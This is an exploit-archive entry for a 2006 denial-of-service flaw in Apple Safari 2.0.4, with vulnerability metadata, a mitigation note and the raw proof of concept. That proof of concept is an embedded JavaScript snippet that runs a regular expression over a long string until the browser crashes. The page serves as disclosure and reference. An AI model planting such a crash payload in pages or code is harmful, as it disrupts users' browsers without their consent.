header-logo
Suggest Exploit
vendor:
Safari
by:
SecurityFocus
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: Safari
Affected Version From: Apple Safari 2.0.4
Affected Version To: Other versions may also be affected.
Patch Exists: Yes
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Apple Safari web browser Denial-of-Service Vulnerability

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code. An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of Apple Safari web browser.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21053/info

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.

An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected.

<script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>

Navigation

Suggest Exploit

Services By CQR